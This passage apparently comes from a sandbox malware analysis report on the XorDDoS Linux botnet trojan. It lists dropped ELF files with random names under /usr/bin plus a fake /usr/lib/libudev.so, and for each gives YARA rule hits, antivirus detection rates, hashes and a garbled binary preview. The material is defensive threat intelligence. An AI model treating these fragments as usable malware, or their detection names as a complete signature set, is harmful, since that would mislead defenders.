                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/efgdvbpuxx, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/efgdvbpuxx, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/efgdvbpuxx, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244382908273548
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ac:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91N
                                                                                                                                                                                    MD5:9E1504DCB6964DBC17834520C7A967C0
                                                                                                                                                                                    SHA1:0A58318C61E5612ABDBBDD3B56DE2754DC7B1C42
                                                                                                                                                                                    SHA-256:F4CFD2974E92A788663911C3EB8C8002E7BEAF014729BFC724D10334A23ABD03
                                                                                                                                                                                    SHA-512:191E35BC70ABC7775DF17A3328D976FB16BA39E1F501D88A8AE9E6E523C25EA430435A672FE34DB3BC66B0BC4FDE18A2D776D14F7967377A8FF2C4F09C6E99D9
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ezztyrfjzf, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ezztyrfjzf, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ezztyrfjzf, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ezztyrfjzf, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.24437710866733
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Aw:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91t
                                                                                                                                                                                    MD5:26D5465CC1A2CAFF5BB4EE89004CBCAE
                                                                                                                                                                                    SHA1:3B3BF9DA9B468198B5F762013FB66825274CC801
                                                                                                                                                                                    SHA-256:44D447EC17097C1282C7E895996715B3339B815B602888234B2D75A8BF4E3221
                                                                                                                                                                                    SHA-512:DAD177A717A093C22A8CE07F64D9BFF46C2574F788D1F3EC83DE503D743AC2BD67D1FDEF32776D96D33CC9B79018D116B9F3ADBDC805EFE5B9CC657245528CCB
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/lkzqkklpfr, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/lkzqkklpfr, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/lkzqkklpfr, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/lkzqkklpfr, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244378583917032
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1Ag:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91B
                                                                                                                                                                                    MD5:25B1B59DAD8E150A80D50015EB75BD53
                                                                                                                                                                                    SHA1:D295FD7681F6E8F3CF4F033618D176A185CBE2E1
                                                                                                                                                                                    SHA-256:FC4203674C4F5D3F452E0E068BD8A82EC46B8785B3B6F178C7C938C5AEC49CD3
                                                                                                                                                                                    SHA-512:3B076C782C3D339B33DBC37152D9B2D3A132AE74213FA69C9E43ED6CAC6972AEA6F9646193B1D0B4F2199BF3BDADB45B7C3B2DFE99DEAF36CE88B532393A5B2E
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/nxattrsdxm, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/nxattrsdxm, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/nxattrsdxm, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/nxattrsdxm, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):610304
                                                                                                                                                                                    Entropy (8bit):6.209325538526162
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl3
                                                                                                                                                                                    MD5:6EF5B9F02482069ECB741DAA33391B1D
                                                                                                                                                                                    SHA1:683579C49F64644F3BBEC227241CF09BCAE5272C
                                                                                                                                                                                    SHA-256:4522DDC164593274A987ACC57EFF3734CC958FC6D79FED6A432C335844ACB510
                                                                                                                                                                                    SHA-512:8A87E82CA3C48488664511D1156A12EBADDD341AA5ABBD0C37E360B4B375DE0D86370A4508BE2DFE5C285BD132F93EF3EC7BA65CBB91996A663B05DC56DFE366
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ssrfvzfvpk, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/ssrfvzfvpk, Author: unknown
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ssrfvzfvpk, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244377453041466
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1A+:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91z
                                                                                                                                                                                    MD5:042D91770189023B9E7A41C9DB18E788
                                                                                                                                                                                    SHA1:5C2AE78E01C690702C5745C26F64B042C18E5FB7
                                                                                                                                                                                    SHA-256:14E93A192447A182A76282D129D6DCEABC1DA6ABC5985D5DD58C286272CF67B9
                                                                                                                                                                                    SHA-512:F7E8A2EF8F9D94AAABE8FF26559753E369C57FB7FBAFA6E8F190A737F2D791B1FF23ECAC29FE065346A8DE0300F17BF6BE9A788810639C2C4D9C0B9F85EB40A8
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uaewjndswe, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/uaewjndswe, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uaewjndswe, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uaewjndswe, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244375802396347
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AI:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91J
                                                                                                                                                                                    MD5:A5394A1EE3B201DFD0198300B6604608
                                                                                                                                                                                    SHA1:AB0E3FB5735A9B1A45CF0C68A3F3D05867D4EFFA
                                                                                                                                                                                    SHA-256:E390B4E6B01136450448D5D42F999F030BDA52A95D37DEFA27C652B1EDB02879
                                                                                                                                                                                    SHA-512:F4D740CFC3D2DC88E6F0CA19D3FBAB46261F484C23AF0468532588DBD9D0776A10F4435E35D3AAEFFF2AB28B17400A7F6E656C1E31678BC00CFB18B649D20B6A
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vapcvdizxx, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/vapcvdizxx, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/vapcvdizxx, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vapcvdizxx, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244375468183062
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1A2:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91r
                                                                                                                                                                                    MD5:41FC2D5615191266DF1F6AB89F56E741
                                                                                                                                                                                    SHA1:6EA67CF65CF25B2E6AB9E7156DDCE256E4B18223
                                                                                                                                                                                    SHA-256:49C005496333FC76F22850E77AAE3113C8B912BF2145A97778EFC19450B0B01B
                                                                                                                                                                                    SHA-512:12E80EEA53D68DA7D6B624D73DB7B13284CF00EBA87AFCEEC67DA176C82FF2190B410B88939DDA09E94EFFBA61518F442B4218CB3D26EAA692CB8A0E0BC32D0D
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vlteqhfomz, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/vlteqhfomz, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/vlteqhfomz, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vlteqhfomz, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625878
                                                                                                                                                                                    Entropy (8bit):6.244387264145506
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AT:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91m
                                                                                                                                                                                    MD5:4AF31D012BBCFF0A3DA05560012A0665
                                                                                                                                                                                    SHA1:53AED6E743386EC3DE0735A7C48C214FE1C6F40C
                                                                                                                                                                                    SHA-256:13372B38B4D3BB33CC8C2A284FFA47643504EAC73B19927F26C37326787B33C6
                                                                                                                                                                                    SHA-512:0BDBCFBF2A960B101E288D512B3054FEA27134F2F4F9EF4D0A98D2E380C27A949C82A914B92377B3CB0E609366084FC0102F7659912A87C2CB578181E90A3731
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wxysocrflf, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/wxysocrflf, Author: unknown
                                                                                                                                                                                    • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/wxysocrflf, Author: Akamai CSIRT
                                                                                                                                                                                    • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wxysocrflf, Author: ditekSHen
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                    Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                                                                    Process:/tmp/1.elf
                                                                                                                                                                                    File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):625867
                                                                                                                                                                                    Entropy (8bit):6.244348963770229
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrryT6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNNyBVEBl/91h
                                                                                                                                                                                    MD5:FF1A3683A5AD87F88858E92FBCF1AE57
                                                                                                                                                                                    SHA1:CE220486F7D4723406582F8496E8483BCC546BEB
                                                                                                                                                                                    SHA-256:D2D0A9FC3491D0689529B251D666F36B739ACFBF4F7FE8190B6EBABB887B7154
                                                                                                                                                                                    SHA-512:9039533B03C9CBD3A31D1F232080A7C6296A74E36CAD46F31678478451B521D0C19CC5CC25CF88BCCC7C4ED006C2F99470595CDD34CF3814EE4509BB80D5EEBD
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
                                                                                                                                                                                    • Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown
